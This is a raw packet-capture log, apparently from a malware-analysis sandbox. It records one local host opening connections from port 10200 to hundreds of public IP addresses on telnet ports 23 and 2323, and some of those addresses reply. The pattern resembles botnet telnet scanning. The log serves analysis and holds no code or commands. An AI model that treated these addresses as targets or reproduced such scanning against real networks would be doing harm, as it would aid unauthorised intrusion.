                                                              Dec 11, 2024 00:43:13.298445940 CET1020023192.168.2.2397.99.236.73
                                                              Dec 11, 2024 00:43:13.298451900 CET1020023192.168.2.2374.250.43.167
                                                              Dec 11, 2024 00:43:13.298451900 CET1020023192.168.2.23175.238.169.38
                                                              Dec 11, 2024 00:43:13.298459053 CET1020023192.168.2.23223.119.116.212
                                                              Dec 11, 2024 00:43:13.298480034 CET1020023192.168.2.23150.93.222.241
                                                              Dec 11, 2024 00:43:13.298481941 CET1020023192.168.2.2371.196.41.55
                                                              Dec 11, 2024 00:43:13.298492908 CET102002323192.168.2.2314.203.148.108
                                                              Dec 11, 2024 00:43:13.298492908 CET1020023192.168.2.23210.86.43.175
                                                              Dec 11, 2024 00:43:13.298504114 CET1020023192.168.2.23158.69.31.65
                                                              Dec 11, 2024 00:43:13.298527002 CET1020023192.168.2.23139.181.215.219
                                                              Dec 11, 2024 00:43:13.298527956 CET1020023192.168.2.23124.38.244.204
                                                              Dec 11, 2024 00:43:13.298527956 CET1020023192.168.2.23106.34.169.239
                                                              Dec 11, 2024 00:43:13.298527956 CET1020023192.168.2.23187.114.108.166
                                                              Dec 11, 2024 00:43:13.298532963 CET1020023192.168.2.23101.251.227.197
                                                              Dec 11, 2024 00:43:13.298537016 CET1020023192.168.2.23196.17.130.133
                                                              Dec 11, 2024 00:43:13.298548937 CET1020023192.168.2.2367.98.32.226
                                                              Dec 11, 2024 00:43:13.298549891 CET102002323192.168.2.2351.12.180.168
                                                              Dec 11, 2024 00:43:13.298559904 CET1020023192.168.2.239.183.204.102
                                                              Dec 11, 2024 00:43:13.298564911 CET1020023192.168.2.23193.190.219.138
                                                              Dec 11, 2024 00:43:13.298579931 CET1020023192.168.2.23100.209.64.66
                                                              Dec 11, 2024 00:43:13.298589945 CET1020023192.168.2.2377.230.116.253
                                                              Dec 11, 2024 00:43:13.298599005 CET1020023192.168.2.23115.83.67.126
                                                              Dec 11, 2024 00:43:13.298603058 CET1020023192.168.2.2383.252.240.160
                                                              Dec 11, 2024 00:43:13.298609972 CET1020023192.168.2.2373.18.126.13
                                                              Dec 11, 2024 00:43:13.298623085 CET1020023192.168.2.2359.179.113.171
                                                              Dec 11, 2024 00:43:13.298629999 CET102002323192.168.2.2358.163.229.97
                                                              Dec 11, 2024 00:43:13.298634052 CET1020023192.168.2.234.159.77.85
                                                              Dec 11, 2024 00:43:13.298646927 CET1020023192.168.2.2347.88.79.40
                                                              Dec 11, 2024 00:43:13.298650980 CET1020023192.168.2.23134.247.182.10
                                                              Dec 11, 2024 00:43:13.298655033 CET1020023192.168.2.2323.149.156.194
                                                              Dec 11, 2024 00:43:13.298655033 CET1020023192.168.2.23207.11.126.186
                                                              Dec 11, 2024 00:43:13.298656940 CET1020023192.168.2.2348.193.226.51
                                                              Dec 11, 2024 00:43:13.298675060 CET1020023192.168.2.2343.44.195.251
                                                              Dec 11, 2024 00:43:13.298675060 CET1020023192.168.2.2399.17.3.151
                                                              Dec 11, 2024 00:43:13.298676014 CET1020023192.168.2.23159.141.34.223
                                                              Dec 11, 2024 00:43:13.298676968 CET1020023192.168.2.23164.69.93.143
                                                              Dec 11, 2024 00:43:13.298703909 CET102002323192.168.2.23117.57.89.59
                                                              Dec 11, 2024 00:43:13.298706055 CET1020023192.168.2.2373.56.254.183
                                                              Dec 11, 2024 00:43:13.298718929 CET1020023192.168.2.2342.175.96.155
                                                              Dec 11, 2024 00:43:13.298729897 CET1020023192.168.2.23135.36.31.225
                                                              Dec 11, 2024 00:43:13.298729897 CET1020023192.168.2.2353.157.216.203
                                                              Dec 11, 2024 00:43:13.298729897 CET1020023192.168.2.23145.192.240.95
                                                              Dec 11, 2024 00:43:13.298732996 CET1020023192.168.2.2360.45.181.254
                                                              Dec 11, 2024 00:43:13.298741102 CET1020023192.168.2.23116.73.236.255
                                                              Dec 11, 2024 00:43:13.298741102 CET1020023192.168.2.2389.121.165.180
                                                              Dec 11, 2024 00:43:13.298747063 CET1020023192.168.2.23196.33.252.0
                                                              Dec 11, 2024 00:43:13.298755884 CET102002323192.168.2.23108.212.249.187
                                                              Dec 11, 2024 00:43:13.298777103 CET1020023192.168.2.2334.118.51.235
                                                              Dec 11, 2024 00:43:13.298779011 CET1020023192.168.2.23104.151.83.233
                                                              Dec 11, 2024 00:43:13.298779964 CET1020023192.168.2.23149.51.142.79
                                                              Dec 11, 2024 00:43:13.298788071 CET1020023192.168.2.23200.15.113.208
                                                              Dec 11, 2024 00:43:13.298788071 CET1020023192.168.2.23212.31.32.168
                                                              Dec 11, 2024 00:43:13.298788071 CET1020023192.168.2.23155.226.134.74
                                                              Dec 11, 2024 00:43:13.298810005 CET1020023192.168.2.23125.61.167.214
                                                              Dec 11, 2024 00:43:13.298815012 CET1020023192.168.2.2377.118.237.140
                                                              Dec 11, 2024 00:43:13.298821926 CET1020023192.168.2.23141.141.245.151
                                                              Dec 11, 2024 00:43:13.298841000 CET102002323192.168.2.2378.116.174.151
                                                              Dec 11, 2024 00:43:13.298841000 CET1020023192.168.2.2398.253.75.100
                                                              Dec 11, 2024 00:43:13.298857927 CET1020023192.168.2.23213.224.172.65
                                                              Dec 11, 2024 00:43:13.298857927 CET1020023192.168.2.23170.207.189.235
                                                              Dec 11, 2024 00:43:13.298857927 CET1020023192.168.2.23159.161.117.44
                                                              Dec 11, 2024 00:43:13.298877954 CET1020023192.168.2.23192.30.13.58
                                                              Dec 11, 2024 00:43:13.298878908 CET1020023192.168.2.2398.125.71.109
                                                              Dec 11, 2024 00:43:13.298892021 CET1020023192.168.2.23145.18.101.67
                                                              Dec 11, 2024 00:43:13.298897982 CET1020023192.168.2.2363.55.156.208
                                                              Dec 11, 2024 00:43:13.298901081 CET1020023192.168.2.23135.63.199.51
                                                              Dec 11, 2024 00:43:13.298918962 CET1020023192.168.2.23149.55.0.53
                                                              Dec 11, 2024 00:43:13.298921108 CET1020023192.168.2.2358.221.4.159
                                                              Dec 11, 2024 00:43:13.298932076 CET1020023192.168.2.23177.239.62.32
                                                              Dec 11, 2024 00:43:13.298935890 CET1020023192.168.2.2375.32.135.237
                                                              Dec 11, 2024 00:43:13.298943996 CET102002323192.168.2.23173.123.3.116
                                                              Dec 11, 2024 00:43:13.298943996 CET1020023192.168.2.23176.5.8.242
                                                              Dec 11, 2024 00:43:13.298948050 CET1020023192.168.2.23180.29.136.61
                                                              Dec 11, 2024 00:43:13.298959017 CET1020023192.168.2.23176.73.72.3
                                                              Dec 11, 2024 00:43:13.298962116 CET1020023192.168.2.23210.129.102.117
                                                              Dec 11, 2024 00:43:13.298975945 CET1020023192.168.2.23178.38.12.128
                                                              Dec 11, 2024 00:43:13.298979998 CET102002323192.168.2.2365.145.87.175
                                                              Dec 11, 2024 00:43:13.298979998 CET1020023192.168.2.2398.206.134.71
                                                              Dec 11, 2024 00:43:13.298984051 CET1020023192.168.2.23115.6.253.191
                                                              Dec 11, 2024 00:43:13.298995018 CET1020023192.168.2.23203.233.222.154
                                                              Dec 11, 2024 00:43:13.299002886 CET1020023192.168.2.23191.136.100.198
                                                              Dec 11, 2024 00:43:13.299024105 CET1020023192.168.2.23167.229.57.21
                                                              Dec 11, 2024 00:43:13.299041033 CET1020023192.168.2.23150.252.2.178
                                                              Dec 11, 2024 00:43:13.299042940 CET1020023192.168.2.23149.134.49.236
                                                              Dec 11, 2024 00:43:13.299042940 CET1020023192.168.2.239.215.177.92
                                                              Dec 11, 2024 00:43:13.299057961 CET102002323192.168.2.2357.111.140.228
                                                              Dec 11, 2024 00:43:13.299061060 CET1020023192.168.2.23102.111.12.53
                                                              Dec 11, 2024 00:43:13.299062967 CET1020023192.168.2.2399.203.76.242
                                                              Dec 11, 2024 00:43:13.299065113 CET1020023192.168.2.2378.92.193.173
                                                              Dec 11, 2024 00:43:13.299068928 CET1020023192.168.2.2320.255.82.252
                                                              Dec 11, 2024 00:43:13.299082041 CET1020023192.168.2.23153.232.212.233
                                                              Dec 11, 2024 00:43:13.299083948 CET1020023192.168.2.23217.149.247.110
                                                              Dec 11, 2024 00:43:13.299083948 CET1020023192.168.2.2373.77.166.228
                                                              Dec 11, 2024 00:43:13.299098969 CET1020023192.168.2.2383.149.252.237
                                                              Dec 11, 2024 00:43:13.299098969 CET1020023192.168.2.2327.190.159.84
                                                              Dec 11, 2024 00:43:13.299104929 CET1020023192.168.2.2377.80.234.24
                                                              Dec 11, 2024 00:43:13.299108028 CET102002323192.168.2.2317.224.170.56
                                                              Dec 11, 2024 00:43:13.299114943 CET1020023192.168.2.2387.198.88.11
                                                              Dec 11, 2024 00:43:13.299137115 CET1020023192.168.2.2369.244.161.4
                                                              Dec 11, 2024 00:43:13.299139023 CET1020023192.168.2.23152.5.153.83
                                                              Dec 11, 2024 00:43:13.299160004 CET1020023192.168.2.23142.254.120.251
                                                              Dec 11, 2024 00:43:13.299163103 CET1020023192.168.2.23114.169.84.36
                                                              Dec 11, 2024 00:43:13.299165964 CET1020023192.168.2.23202.61.160.245
                                                              Dec 11, 2024 00:43:13.299166918 CET1020023192.168.2.2337.255.152.73
                                                              Dec 11, 2024 00:43:13.299179077 CET1020023192.168.2.23153.199.56.43
                                                              Dec 11, 2024 00:43:13.299191952 CET1020023192.168.2.2379.184.22.116
                                                              Dec 11, 2024 00:43:13.299194098 CET102002323192.168.2.23102.137.231.109
                                                              Dec 11, 2024 00:43:13.299194098 CET1020023192.168.2.23133.117.11.23
                                                              Dec 11, 2024 00:43:13.299195051 CET1020023192.168.2.2360.253.155.178
                                                              Dec 11, 2024 00:43:13.299215078 CET1020023192.168.2.2331.168.231.139
                                                              Dec 11, 2024 00:43:13.299216986 CET1020023192.168.2.23123.253.151.177
                                                              Dec 11, 2024 00:43:13.299220085 CET1020023192.168.2.2324.11.254.231
                                                              Dec 11, 2024 00:43:13.299221039 CET1020023192.168.2.23179.222.219.45
                                                              Dec 11, 2024 00:43:13.299248934 CET1020023192.168.2.2364.53.148.144
                                                              Dec 11, 2024 00:43:13.299249887 CET1020023192.168.2.23146.101.72.12
                                                              Dec 11, 2024 00:43:13.299249887 CET1020023192.168.2.23170.111.84.136
                                                              Dec 11, 2024 00:43:13.299266100 CET102002323192.168.2.23156.183.113.226
                                                              Dec 11, 2024 00:43:13.299269915 CET1020023192.168.2.23126.216.17.158
                                                              Dec 11, 2024 00:43:13.299284935 CET1020023192.168.2.23168.212.152.160
                                                              Dec 11, 2024 00:43:13.299290895 CET1020023192.168.2.23102.116.38.220
                                                              Dec 11, 2024 00:43:13.299290895 CET102001023192.168.2.2394.48.102.219
                                                              Dec 11, 2024 00:43:13.299307108 CET1020023192.168.2.2313.65.250.219
                                                              Dec 11, 2024 00:43:13.299310923 CET1020023192.168.2.23108.43.146.242
                                                              Dec 11, 2024 00:43:13.299335957 CET1020023192.168.2.2331.218.150.33
                                                              Dec 11, 2024 00:43:13.299336910 CET1020023192.168.2.2379.231.213.108
                                                              Dec 11, 2024 00:43:13.299344063 CET102002323192.168.2.23151.252.217.97
                                                              Dec 11, 2024 00:43:13.299349070 CET1020023192.168.2.23126.155.23.86
                                                              Dec 11, 2024 00:43:13.299355030 CET1020023192.168.2.23109.16.70.193
                                                              Dec 11, 2024 00:43:13.299360991 CET1020023192.168.2.2390.154.92.221
                                                              Dec 11, 2024 00:43:13.299374104 CET1020023192.168.2.23146.192.182.2
                                                              Dec 11, 2024 00:43:13.299374104 CET1020023192.168.2.23138.200.173.55
                                                              Dec 11, 2024 00:43:13.299377918 CET1020023192.168.2.2348.175.200.228
                                                              Dec 11, 2024 00:43:13.299377918 CET1020023192.168.2.23107.112.214.99
                                                              Dec 11, 2024 00:43:13.299381971 CET1020023192.168.2.2372.90.140.103
                                                              Dec 11, 2024 00:43:13.299405098 CET1020023192.168.2.2318.94.211.189
                                                              Dec 11, 2024 00:43:13.299421072 CET1020023192.168.2.234.226.240.70
                                                              Dec 11, 2024 00:43:13.299422026 CET102002323192.168.2.23125.187.41.99
                                                              Dec 11, 2024 00:43:13.299434900 CET1020023192.168.2.2353.67.62.146
                                                              Dec 11, 2024 00:43:13.299434900 CET1020023192.168.2.23182.77.96.116
                                                              Dec 11, 2024 00:43:13.299442053 CET1020023192.168.2.23117.153.164.77
                                                              Dec 11, 2024 00:43:13.299444914 CET1020023192.168.2.2344.253.236.191
                                                              Dec 11, 2024 00:43:13.299444914 CET1020023192.168.2.2337.112.60.250
                                                              Dec 11, 2024 00:43:13.299465895 CET1020023192.168.2.23103.180.60.85
                                                              Dec 11, 2024 00:43:13.299467087 CET1020023192.168.2.23187.124.108.74
                                                              Dec 11, 2024 00:43:13.299468040 CET1020023192.168.2.2378.232.255.17
                                                              Dec 11, 2024 00:43:13.299491882 CET1020023192.168.2.23182.200.247.149
                                                              Dec 11, 2024 00:43:13.299508095 CET102002323192.168.2.2312.237.103.18
                                                              Dec 11, 2024 00:43:13.299509048 CET1020023192.168.2.23180.108.178.227
                                                              Dec 11, 2024 00:43:13.299509048 CET1020023192.168.2.2375.189.190.61
                                                              Dec 11, 2024 00:43:13.299525023 CET1020023192.168.2.23107.227.136.125
                                                              Dec 11, 2024 00:43:13.299527884 CET1020023192.168.2.2354.118.157.18
                                                              Dec 11, 2024 00:43:13.299532890 CET1020023192.168.2.2340.80.153.133
                                                              Dec 11, 2024 00:43:13.299532890 CET1020023192.168.2.23156.44.223.211
                                                              Dec 11, 2024 00:43:13.299551010 CET1020023192.168.2.23171.244.252.160
                                                              Dec 11, 2024 00:43:13.299552917 CET1020023192.168.2.23168.150.53.154
                                                              Dec 11, 2024 00:43:13.299562931 CET1020023192.168.2.2371.42.35.139
                                                              Dec 11, 2024 00:43:13.419976950 CET102310200185.191.105.135192.168.2.23
                                                              Dec 11, 2024 00:43:13.419991016 CET2310200110.145.64.224192.168.2.23
                                                              Dec 11, 2024 00:43:13.420000076 CET23102009.17.86.111192.168.2.23
                                                              Dec 11, 2024 00:43:13.420020103 CET2310200102.5.124.154192.168.2.23
                                                              Dec 11, 2024 00:43:13.420034885 CET231020074.250.43.167192.168.2.23
                                                              Dec 11, 2024 00:43:13.420042038 CET102001023192.168.2.23185.191.105.135
                                                              Dec 11, 2024 00:43:13.420042992 CET2310200175.238.169.38192.168.2.23
                                                              Dec 11, 2024 00:43:13.420047998 CET1020023192.168.2.239.17.86.111
                                                              Dec 11, 2024 00:43:13.420048952 CET1020023192.168.2.23110.145.64.224
                                                              Dec 11, 2024 00:43:13.420052052 CET231020097.99.236.73192.168.2.23
                                                              Dec 11, 2024 00:43:13.420068979 CET2310200223.119.116.212192.168.2.23
                                                              Dec 11, 2024 00:43:13.420078039 CET1020023192.168.2.23102.5.124.154
                                                              Dec 11, 2024 00:43:13.420078993 CET2310200150.93.222.241192.168.2.23
                                                              Dec 11, 2024 00:43:13.420088053 CET1020023192.168.2.2374.250.43.167
                                                              Dec 11, 2024 00:43:13.420088053 CET1020023192.168.2.23175.238.169.38
                                                              Dec 11, 2024 00:43:13.420089006 CET231020071.196.41.55192.168.2.23
                                                              Dec 11, 2024 00:43:13.420089006 CET1020023192.168.2.2397.99.236.73
                                                              Dec 11, 2024 00:43:13.420098066 CET23231020014.203.148.108192.168.2.23
                                                              Dec 11, 2024 00:43:13.420115948 CET2310200210.86.43.175192.168.2.23
                                                              Dec 11, 2024 00:43:13.420120001 CET1020023192.168.2.23223.119.116.212
                                                              Dec 11, 2024 00:43:13.420120001 CET1020023192.168.2.23150.93.222.241
                                                              Dec 11, 2024 00:43:13.420124054 CET1020023192.168.2.2371.196.41.55
                                                              Dec 11, 2024 00:43:13.420125008 CET2310200158.69.31.65192.168.2.23
                                                              Dec 11, 2024 00:43:13.420134068 CET2310200139.181.215.219192.168.2.23
                                                              Dec 11, 2024 00:43:13.420142889 CET2310200101.251.227.197192.168.2.23
                                                              Dec 11, 2024 00:43:13.420145035 CET102002323192.168.2.2314.203.148.108
                                                              Dec 11, 2024 00:43:13.420151949 CET2310200124.38.244.204192.168.2.23
                                                              Dec 11, 2024 00:43:13.420162916 CET1020023192.168.2.23210.86.43.175
                                                              Dec 11, 2024 00:43:13.420165062 CET2310200187.114.108.166192.168.2.23
                                                              Dec 11, 2024 00:43:13.420170069 CET1020023192.168.2.23139.181.215.219
                                                              Dec 11, 2024 00:43:13.420171022 CET1020023192.168.2.23158.69.31.65
                                                              Dec 11, 2024 00:43:13.420175076 CET2310200106.34.169.239192.168.2.23
                                                              Dec 11, 2024 00:43:13.420183897 CET1020023192.168.2.23101.251.227.197
                                                              Dec 11, 2024 00:43:13.420188904 CET1020023192.168.2.23124.38.244.204
                                                              Dec 11, 2024 00:43:13.420214891 CET1020023192.168.2.23187.114.108.166
                                                              Dec 11, 2024 00:43:13.420217991 CET1020023192.168.2.23106.34.169.239
                                                              Dec 11, 2024 00:43:13.420248985 CET2310200196.17.130.133192.168.2.23
                                                              Dec 11, 2024 00:43:13.420258045 CET23231020051.12.180.168192.168.2.23
                                                              Dec 11, 2024 00:43:13.420267105 CET231020067.98.32.226192.168.2.23
                                                              Dec 11, 2024 00:43:13.420274973 CET23102009.183.204.102192.168.2.23
                                                              Dec 11, 2024 00:43:13.420283079 CET2310200193.190.219.138192.168.2.23
                                                              Dec 11, 2024 00:43:13.420289040 CET1020023192.168.2.23196.17.130.133
                                                              Dec 11, 2024 00:43:13.420289993 CET102002323192.168.2.2351.12.180.168
                                                              Dec 11, 2024 00:43:13.420291901 CET2310200100.209.64.66192.168.2.23
                                                              Dec 11, 2024 00:43:13.420295954 CET231020077.230.116.253192.168.2.23
                                                              Dec 11, 2024 00:43:13.420296907 CET1020023192.168.2.2367.98.32.226
                                                              Dec 11, 2024 00:43:13.420304060 CET2310200115.83.67.126192.168.2.23
                                                              Dec 11, 2024 00:43:13.420312881 CET231020073.18.126.13192.168.2.23
                                                              Dec 11, 2024 00:43:13.420317888 CET1020023192.168.2.23100.209.64.66
                                                              Dec 11, 2024 00:43:13.420320988 CET231020083.252.240.160192.168.2.23
                                                              Dec 11, 2024 00:43:13.420329094 CET1020023192.168.2.2377.230.116.253
                                                              Dec 11, 2024 00:43:13.420331001 CET1020023192.168.2.23193.190.219.138
                                                              Dec 11, 2024 00:43:13.420331001 CET1020023192.168.2.23115.83.67.126
                                                              Dec 11, 2024 00:43:13.420337915 CET1020023192.168.2.2373.18.126.13
                                                              Dec 11, 2024 00:43:13.420344114 CET1020023192.168.2.239.183.204.102
                                                              Dec 11, 2024 00:43:13.420361996 CET1020023192.168.2.2383.252.240.160
                                                              Dec 11, 2024 00:43:13.420420885 CET231020059.179.113.171192.168.2.23
                                                              Dec 11, 2024 00:43:13.420439005 CET23231020058.163.229.97192.168.2.23
                                                              Dec 11, 2024 00:43:13.420448065 CET23102004.159.77.85192.168.2.23
                                                              Dec 11, 2024 00:43:13.420456886 CET231020047.88.79.40192.168.2.23
                                                              Dec 11, 2024 00:43:13.420458078 CET1020023192.168.2.2359.179.113.171
                                                              Dec 11, 2024 00:43:13.420464993 CET2310200134.247.182.10192.168.2.23
                                                              Dec 11, 2024 00:43:13.420481920 CET231020023.149.156.194192.168.2.23
                                                              Dec 11, 2024 00:43:13.420490980 CET102002323192.168.2.2358.163.229.97
                                                              Dec 11, 2024 00:43:13.420491934 CET231020048.193.226.51192.168.2.23
                                                              Dec 11, 2024 00:43:13.420495033 CET1020023192.168.2.2347.88.79.40
                                                              Dec 11, 2024 00:43:13.420495987 CET1020023192.168.2.234.159.77.85
                                                              Dec 11, 2024 00:43:13.420495987 CET1020023192.168.2.23134.247.182.10
                                                              Dec 11, 2024 00:43:13.420500994 CET2310200207.11.126.186192.168.2.23
                                                              Dec 11, 2024 00:43:13.420511007 CET2310200164.69.93.143192.168.2.23
                                                              Dec 11, 2024 00:43:13.420521021 CET231020043.44.195.251192.168.2.23
                                                              Dec 11, 2024 00:43:13.420525074 CET1020023192.168.2.2348.193.226.51
                                                              Dec 11, 2024 00:43:13.420527935 CET1020023192.168.2.2323.149.156.194
                                                              Dec 11, 2024 00:43:13.420528889 CET1020023192.168.2.23207.11.126.186
                                                              Dec 11, 2024 00:43:13.420552015 CET1020023192.168.2.23164.69.93.143
                                                              Dec 11, 2024 00:43:13.420553923 CET1020023192.168.2.2343.44.195.251
                                                              Dec 11, 2024 00:43:13.421658039 CET231020099.17.3.151192.168.2.23
                                                              Dec 11, 2024 00:43:13.421669006 CET2310200159.141.34.223192.168.2.23
                                                              Dec 11, 2024 00:43:13.421677113 CET232310200117.57.89.59192.168.2.23
                                                              Dec 11, 2024 00:43:13.421684027 CET231020073.56.254.183192.168.2.23
                                                              Dec 11, 2024 00:43:13.421696901 CET231020042.175.96.155192.168.2.23
                                                              Dec 11, 2024 00:43:13.421710968 CET2310200135.36.31.225192.168.2.23
                                                              Dec 11, 2024 00:43:13.421715975 CET1020023192.168.2.2399.17.3.151
                                                              Dec 11, 2024 00:43:13.421715975 CET1020023192.168.2.23159.141.34.223
                                                              Dec 11, 2024 00:43:13.421720028 CET231020060.45.181.254192.168.2.23
                                                              Dec 11, 2024 00:43:13.421720982 CET102002323192.168.2.23117.57.89.59
                                                              Dec 11, 2024 00:43:13.421720982 CET1020023192.168.2.2342.175.96.155
                                                              Dec 11, 2024 00:43:13.421722889 CET1020023192.168.2.2373.56.254.183
                                                              Dec 11, 2024 00:43:13.421729088 CET231020053.157.216.203192.168.2.23
                                                              Dec 11, 2024 00:43:13.421736002 CET2310200116.73.236.255192.168.2.23
                                                              Dec 11, 2024 00:43:13.421739101 CET1020023192.168.2.23135.36.31.225
                                                              Dec 11, 2024 00:43:13.421753883 CET1020023192.168.2.2353.157.216.203
                                                              Dec 11, 2024 00:43:13.421758890 CET1020023192.168.2.2360.45.181.254
                                                              Dec 11, 2024 00:43:13.421763897 CET1020023192.168.2.23116.73.236.255
                                                              Dec 11, 2024 00:43:13.421881914 CET2310200145.192.240.95192.168.2.23
                                                              Dec 11, 2024 00:43:13.421891928 CET231020089.121.165.180192.168.2.23
                                                              Dec 11, 2024 00:43:13.421904087 CET2310200196.33.252.0192.168.2.23
                                                              Dec 11, 2024 00:43:13.421911955 CET232310200108.212.249.187192.168.2.23
                                                              Dec 11, 2024 00:43:13.421921968 CET231020034.118.51.235192.168.2.23
                                                              Dec 11, 2024 00:43:13.421924114 CET1020023192.168.2.23145.192.240.95
                                                              Dec 11, 2024 00:43:13.421926975 CET1020023192.168.2.2389.121.165.180
                                                              Dec 11, 2024 00:43:13.421931982 CET2310200104.151.83.233192.168.2.23
                                                              Dec 11, 2024 00:43:13.421941042 CET2310200149.51.142.79192.168.2.23
                                                              Dec 11, 2024 00:43:13.421946049 CET1020023192.168.2.23196.33.252.0
                                                              Dec 11, 2024 00:43:13.421947956 CET102002323192.168.2.23108.212.249.187
                                                              Dec 11, 2024 00:43:13.421950102 CET2310200200.15.113.208192.168.2.23
                                                              Dec 11, 2024 00:43:13.421953917 CET1020023192.168.2.2334.118.51.235
                                                              Dec 11, 2024 00:43:13.421960115 CET2310200212.31.32.168192.168.2.23
                                                              Dec 11, 2024 00:43:13.421963930 CET1020023192.168.2.23104.151.83.233
                                                              Dec 11, 2024 00:43:13.421968937 CET2310200155.226.134.74192.168.2.23
                                                              Dec 11, 2024 00:43:13.421977043 CET2310200125.61.167.214192.168.2.23
                                                              Dec 11, 2024 00:43:13.421984911 CET231020077.118.237.140192.168.2.23
                                                              Dec 11, 2024 00:43:13.421988010 CET2310200141.141.245.151192.168.2.23
                                                              Dec 11, 2024 00:43:13.421988964 CET1020023192.168.2.23149.51.142.79
                                                              Dec 11, 2024 00:43:13.421992064 CET23231020078.116.174.151192.168.2.23
                                                              Dec 11, 2024 00:43:13.421996117 CET231020098.253.75.100192.168.2.23
                                                              Dec 11, 2024 00:43:13.422000885 CET2310200213.224.172.65192.168.2.23
                                                              Dec 11, 2024 00:43:13.422009945 CET2310200170.207.189.235192.168.2.23
                                                              Dec 11, 2024 00:43:13.422010899 CET1020023192.168.2.23200.15.113.208
                                                              Dec 11, 2024 00:43:13.422010899 CET1020023192.168.2.23212.31.32.168
                                                              Dec 11, 2024 00:43:13.422010899 CET1020023192.168.2.23155.226.134.74
                                                              Dec 11, 2024 00:43:13.422012091 CET1020023192.168.2.23125.61.167.214
                                                              Dec 11, 2024 00:43:13.422013998 CET2310200159.161.117.44192.168.2.23
                                                              Dec 11, 2024 00:43:13.422018051 CET1020023192.168.2.2377.118.237.140
                                                              Dec 11, 2024 00:43:13.422018051 CET102002323192.168.2.2378.116.174.151
                                                              Dec 11, 2024 00:43:13.422023058 CET2310200192.30.13.58192.168.2.23
                                                              Dec 11, 2024 00:43:13.422025919 CET1020023192.168.2.23141.141.245.151
                                                              Dec 11, 2024 00:43:13.422025919 CET1020023192.168.2.2398.253.75.100
                                                              Dec 11, 2024 00:43:13.422036886 CET1020023192.168.2.23213.224.172.65
                                                              Dec 11, 2024 00:43:13.422046900 CET1020023192.168.2.23170.207.189.235
                                                              Dec 11, 2024 00:43:13.422046900 CET1020023192.168.2.23159.161.117.44
                                                              Dec 11, 2024 00:43:13.422064066 CET1020023192.168.2.23192.30.13.58
                                                              Dec 11, 2024 00:43:13.422333956 CET231020098.125.71.109192.168.2.23
                                                              Dec 11, 2024 00:43:13.422343969 CET2310200145.18.101.67192.168.2.23
                                                              Dec 11, 2024 00:43:13.422352076 CET231020063.55.156.208192.168.2.23
                                                              Dec 11, 2024 00:43:13.422358990 CET2310200135.63.199.51192.168.2.23
                                                              Dec 11, 2024 00:43:13.422363043 CET2310200149.55.0.53192.168.2.23
                                                              Dec 11, 2024 00:43:13.422380924 CET1020023192.168.2.2398.125.71.109
                                                              Dec 11, 2024 00:43:13.422385931 CET1020023192.168.2.23145.18.101.67
                                                              Dec 11, 2024 00:43:13.422393084 CET1020023192.168.2.23149.55.0.53
                                                              Dec 11, 2024 00:43:13.422393084 CET1020023192.168.2.23135.63.199.51
                                                              Dec 11, 2024 00:43:13.422418118 CET1020023192.168.2.2363.55.156.208
                                                              Dec 11, 2024 00:43:13.422477961 CET231020058.221.4.159192.168.2.23
                                                              Dec 11, 2024 00:43:13.422487974 CET2310200177.239.62.32192.168.2.23
                                                              Dec 11, 2024 00:43:13.422502041 CET231020075.32.135.237192.168.2.23
                                                              Dec 11, 2024 00:43:13.422513008 CET232310200173.123.3.116192.168.2.23
                                                              Dec 11, 2024 00:43:13.422514915 CET1020023192.168.2.2358.221.4.159
                                                              Dec 11, 2024 00:43:13.422521114 CET2310200180.29.136.61192.168.2.23
                                                              Dec 11, 2024 00:43:13.422529936 CET2310200176.5.8.242192.168.2.23
                                                              Dec 11, 2024 00:43:13.422529936 CET1020023192.168.2.23177.239.62.32
                                                              Dec 11, 2024 00:43:13.422533989 CET1020023192.168.2.2375.32.135.237
                                                              Dec 11, 2024 00:43:13.422538042 CET2310200176.73.72.3192.168.2.23
                                                              Dec 11, 2024 00:43:13.422549009 CET2310200210.129.102.117192.168.2.23
                                                              Dec 11, 2024 00:43:13.422553062 CET1020023192.168.2.23180.29.136.61
                                                              Dec 11, 2024 00:43:13.422553062 CET102002323192.168.2.23173.123.3.116
                                                              Dec 11, 2024 00:43:13.422565937 CET1020023192.168.2.23176.73.72.3
                                                              Dec 11, 2024 00:43:13.422568083 CET2310200178.38.12.128192.168.2.23
                                                              Dec 11, 2024 00:43:13.422569990 CET1020023192.168.2.23176.5.8.242
                                                              Dec 11, 2024 00:43:13.422578096 CET231020098.206.134.71192.168.2.23
                                                              Dec 11, 2024 00:43:13.422581911 CET23231020065.145.87.175192.168.2.23
                                                              Dec 11, 2024 00:43:13.422585964 CET1020023192.168.2.23210.129.102.117
                                                              Dec 11, 2024 00:43:13.422590017 CET2310200115.6.253.191192.168.2.23
                                                              Dec 11, 2024 00:43:13.422597885 CET2310200203.233.222.154192.168.2.23
                                                              Dec 11, 2024 00:43:13.422605991 CET2310200191.136.100.198192.168.2.23
                                                              Dec 11, 2024 00:43:13.422611952 CET1020023192.168.2.23178.38.12.128
                                                              Dec 11, 2024 00:43:13.422612906 CET1020023192.168.2.2398.206.134.71
                                                              Dec 11, 2024 00:43:13.422615051 CET2310200167.229.57.21192.168.2.23
                                                              Dec 11, 2024 00:43:13.422629118 CET1020023192.168.2.23115.6.253.191
                                                              Dec 11, 2024 00:43:13.422631979 CET102002323192.168.2.2365.145.87.175
                                                              Dec 11, 2024 00:43:13.422631979 CET2310200150.252.2.178192.168.2.23
                                                              Dec 11, 2024 00:43:13.422638893 CET1020023192.168.2.23191.136.100.198
                                                              Dec 11, 2024 00:43:13.422641039 CET2310200149.134.49.236192.168.2.23
                                                              Dec 11, 2024 00:43:13.422645092 CET1020023192.168.2.23167.229.57.21
                                                              Dec 11, 2024 00:43:13.422651052 CET23102009.215.177.92192.168.2.23
                                                              Dec 11, 2024 00:43:13.422652006 CET1020023192.168.2.23203.233.222.154
                                                              Dec 11, 2024 00:43:13.422660112 CET23231020057.111.140.228192.168.2.23
                                                              Dec 11, 2024 00:43:13.422672033 CET2310200102.111.12.53192.168.2.23
                                                              Dec 11, 2024 00:43:13.422679901 CET231020099.203.76.242192.168.2.23
                                                              Dec 11, 2024 00:43:13.422682047 CET1020023192.168.2.23149.134.49.236
                                                              Dec 11, 2024 00:43:13.422682047 CET1020023192.168.2.239.215.177.92
                                                              Dec 11, 2024 00:43:13.422688007 CET1020023192.168.2.23150.252.2.178
                                                              Dec 11, 2024 00:43:13.422692060 CET231020078.92.193.173192.168.2.23
                                                              Dec 11, 2024 00:43:13.422699928 CET231020020.255.82.252192.168.2.23
                                                              Dec 11, 2024 00:43:13.422704935 CET1020023192.168.2.23102.111.12.53
                                                              Dec 11, 2024 00:43:13.422713995 CET102002323192.168.2.2357.111.140.228
